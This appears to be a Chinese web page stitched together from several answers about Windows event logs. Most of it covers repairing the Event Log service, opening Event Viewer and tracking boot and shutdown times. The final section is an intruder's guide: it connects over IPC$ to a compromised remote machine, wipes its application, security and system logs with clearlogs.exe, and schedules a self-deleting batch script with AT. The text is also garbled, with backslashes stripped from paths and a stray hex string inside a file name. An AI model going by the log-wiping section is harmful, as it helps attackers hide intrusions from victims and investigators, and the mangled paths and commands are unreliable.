计算机无法打开eventlog,电脑系统日志不能查看怎么办

1. 系统日志无法打开怎么解决

WINDOWS7和VISTA操作系统在点日志查看器时，会显示“事件日志服务不可用，请验证服务是否在运行”，给我的第一感觉是权限不够。

但网上说法芸芸：我马上就去『服务』里尝试启动Windows Event Log的服务，结果系统又提示Windows 无法启动 Windows Event Log 服务 (位于 本地计算机上)。错误 4201： 无法识别传来的实例名是否为有效的 WMI 数据提供程序。

搜索相关的关键字，查看了几个链接之后，果然大多数的人也是不知道是什么原因导致事件查看器启动不能了，但是人多，点子也多，倒是有不少解决办法(或者说是偏方吧)以下3种方法，我都尝试了，也没解决，最后参照第3种方法但方式不同解决了。方法1，取得『%SystemRoot%LogFiles』文件夹和『%SystemRoot%System32wbem』文件夹的权限(包括这两个文件夹的所有子文件夹的权限)，简单点说，就是使你当前的帐户拥有这两个文件夹以及它们的子文件夹的绝对控制权限。

这是最简单的方法，不少老外说，这样一弄，倒是解决了问题。不过对我的系统，没用；—————————————————————————————————–方法2，以不带网络的安全模式启动，运行命令行，输入“net stop winmgmt”(不带引号)，确认WMI服务停止后，将『%SystemRoot%System32wbem』下的『Repository』文件夹重命名，然后再次转到命令行，输入“winmgmt /resetRepository”(不带引号)，重启系统，测试事件查看器是否工作正常。

这个方法据说效果最好，很多人靠这个修复了4201错误。很不走运，这个方法对我的系统还是无效；—————————————————————————————————–方法3，删除『%SystemRoot%Logs』文件夹和『%SystemRoot% System32LogFiles』文件夹(不用担心删除后造成不好的结果，系统会自动重新建立它们的)，不过由于系统正在访问这两个文件夹里的文件，即使你拥有它们的绝对控制权，你也还是无法删除它们的。

此时就需要借助MoveFile这个软件了(下载页面：猛击进入)，它可以在系统启动的时候对文件、文件夹进行移动、删除等操作，借助一个批处理，搞定。批处理内容如下：“X:***movefile.exe” “C:WindowsSystem32LogFiles” “”“X:***movefile.exe” “C:WindowsLogs” “”仍然不幸，不能解决。

后来发现，第3种方法本来应该删除C:WindowsSystem32LogFiles和C:WindowsLogs文件夹，但实际上没有删除，于是想到了—————————————————————————————————–第4种方法：用unlocker强制删除C:WindowsSystem32LogFiles和C:WindowsLogs文件夹。用 unlocker删除C:WindowsLogs文件夹倒是比较容易，先解锁，然后删除就行了。

但删除C:WindowsSystem32 LogFile文件夹时提示不能马上删除，下次启动时才删除，所以重启系统，结果发现重启后删除了文件中的部分内容，整个文件夹的属性中看到创建日期仍然是以前的日期，修改日期倒是今天，于是判断是删除不彻底。后来想到了，将C:WindowsSystem32LogFile文件夹改名应该可以，所以就用unlocker改名，仍然需要重启系统，重启后发现重命名成功，系统新建立了个C:WindowsSystem32LogFile文件夹。

这时Windows Event Log(事件查看记录服务)已经成功启了。—————————————————————————————————–分析：第3、4其实想法是一样的，就是完全删除那两个目录，然后让windows重新建立，不过不知为什么第3方法不成功。

也许vista分配权限的问题？这个就没再研究了，怕把系统给整坏了：)。使用win7的事件查看器的时候提示“显示事件日志服务不可用，请验证服务是否在运行”，无法使用。

在服务管理看到Windows event log没有启动，点击启动的时候出现Windows 无法启动 Windows Event Log 服务 (位于 本地计算机上)。错误 4201： 无法识别传来的实例名是否为有效的 WMI 数据提供程序解决方法：下载unlocker软件 删除C:WindowsSystem32LogFilesWMI的RtBackup文件夹，重启系统即可。

2. 怎样查看系统错误日志

当电脑系统出现蓝屏或其他故障时，可查看系统错误日志来查找原因，按照如下步骤即可查看：

1、首先右击这台电脑，在弹窗中点击管理。

2、在弹出的对话框中点击系统工具。

3、在系统工具的下拉菜单中，点击事件查看器。

4、然后在事件管理器的下拉菜单中点击Windows日志，可以在右侧看到有应用程序、安全、设置等日志。

5、然后打开其中的系统日志，可以看到有很多写着错误的文件。

6、双击打开其中一个错误日志，即可打开查看详细的信息。

3. windows系统日志怎么看

记录开机时间，看谁动了你的电脑2008-10-01 08:27经常感觉到自己的计算机突然就不太好用了，总怀疑别人在自己离开的时候，启动了电脑，并“祸害”一顿然后关机走人(旁白：设置一个口令就能解决，但都是乡里乡亲的，不太好意思，全靠自觉吧！)。如果能知道自己电脑的开关机记录，那不就一清二楚了吗？下面我介绍两种方法，不用任何工具，一切手动完成，一般人我不告诉他哦！

一天记录轻松看

如果你只是想查看一下，从昨天关机到今天开机之间有没有人使用我的计算机，那么使用“查日志”的方法就可以了。在“开始”菜单的运行”中输入“eventvwr.msc”，打开事件查看器，在左侧窗口中选择“系统”，从右侧系统事件中查找事件ID为6005、6006的事件(事件ID号为6005的事件表示事件日志服务已启动，即开机，同理事件ID:6006表示关机)，它们对应的时间就分别是开机时间和关机时间

如果你觉得从这么多事件中找开关机事件太费事，你可以使用“筛选”来使内容简洁。在事件查看器的“查看”菜单中选择“筛选”选项，在属性对话框中选择“筛选器”选项卡，并在其中勾选“信息”、“警告”、“错误”三项，在“事件来源”下拉列表中选择“eventlog”，单击“确定”按钮后，系统事件中的内容就少了很多，我们可以轻易找到最近的开关机时间。

如果你依旧觉得太费事，那只好使用必杀技了。在“开始”菜单中的“运行”中输入“C:WINDOWSschedlgu.txt”，在打开的schedlgu.txt文件中有“任务计划程序服务”已启动于和“任务计划程序服务”已退出于的时间，分别对应着开机和关机时间，是不是很方便呢？

天天备案也不难

如果你想每一次开关机都能清楚地记录在案，那可以用“脚本+批处理”的方法。不过你要亲自动手了，我们使用“脚本+批处理”的方式来实现。只需在开机、关机脚本上添加两个记录时间的批处理命令，让它们随系统启动或关闭记录当时的时间到C:aaa.txt文件中。

首先新建两个文本文档，分别用来记录开机和关机信息，输入以下的命令，然后另存为“.bat”文件就可以了。其中开机批处理(start.bat)如下：

@echo off

>>c:aaa.txt echo ***开机记录***

>>c:aaa.txt echo.

>>c:aaa.txt echo %date% %time:~0,-3% %username%

>>c:aaa.txt echo.

>>c:aaa.txt echo **************

>>c:aaa.txt echo.

>>c:aaa.txt echo.

而关机批处理(shutdown.bat)命令只要把7a686964616fe4b893e5b19e31333239303236start.bat中的“***开机记录***”改为“***关机记录***”即可，其余不变。将上面的两个批处理命令做好后，在“开始”菜单中的“运行”中输入gpedit.msc，打开组策略，依次找到“计算机配置→windows设置→脚本(启动和关机)”，双击“启动”，在属性对话框中单击“添加”按钮，并在“脚本名”一栏中填入“start.bat”的绝对路径，单击“确定”按钮(如图2)。同理设置好关机脚本。这样可以了，开关机做个实验，打开C:aaa.txt文件，是不是记录了你刚才的关机和开机时间呢？

4. 如何查看Windows错误日志

查看Windows系统日志 控制面板→管理工具→事件查看器 或 右击我的电脑——管理——事件查看器 回答人的补充 点击“开始→运行”，输入eventvwr，点击“确定”，也可以打开事件查看器

包含由应用程序或系统程序记录的事件，主要记录程序运行方面的事件，例如数据库程序可以在应用程序日志中记录文件错误，程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况，那么我们可以从程序事件日志中找到相应的记录，也许会有助于你解决问题。

5. 怎么查看windows系统日志

查看Win7开关机日志的方法： 1. 按Ctrl+D键返回windows7桌面，在“计算机”图标上点右击，选择弹出菜单中的“管理”命令；

2. 在打开的“计算机管理”窗口左侧，依次“事件查看器”、“Windows日志”、“系统”：

3. 如果你的系统日志较多，在点击“系统”后窗口会卡住，没有关系，稍等既可；

4. 然后点击右侧“操作”下的的“筛选当前日志”链接，如上图；

5. 在打开的对话框里，“事件来源”处选择“Kernel-liower”:

6. 然后在“任务类别”列表选择“86”(开机)和“103”(关机)两项如上图；

7. 当然，你也可以不选择，就是查看所有的与电源操作相关的事件了，比待机、休眠等；

8. 然后单击“确定”按钮既可。

6. 电脑系统日志怎么才能看不到你开机

系统日志文件：%sys temroot%sys tem32configSysEvent.EVT 在注册表里的日志LOG文件在注册表中的位置： HKEY_LOCAL_MACHINEsys temCurrentControlSetServicesEventlog

使用工具clearlog.exe清理工具清理方法如下：

使用方法：

Usage: clearlogs [\computername]

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去： net use \ipipc$ 密码/user：用户名

** 然后开始清除： 方法

clearlogs \ip -app 这个是清除远程计算机的应用程序日志

clearlogs \ip -sec 这个是清除远程计算机的安全日志

clearlogs \ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志： 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除. 方法：

clearlogs -app 这个是清除远程计算机的应用程序日志

clearlogs -sec 这个是清除远程计算机的安全日志

clearlogs -sys 这个是清除远程计算机的系统罩？

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.

例如建立一个 c.bat

rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果

第一行表示： 运行时不显示窗口

第二行表示： 清除应用程序日志

第三行表示： 清除安全日志

第四行表示： 清除系统日志

第五行表示： 删除 clearlogs.exe 这个工具

第六行表示： 删除 c.bat 这个批处理文件

第七行表示： 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:c.bat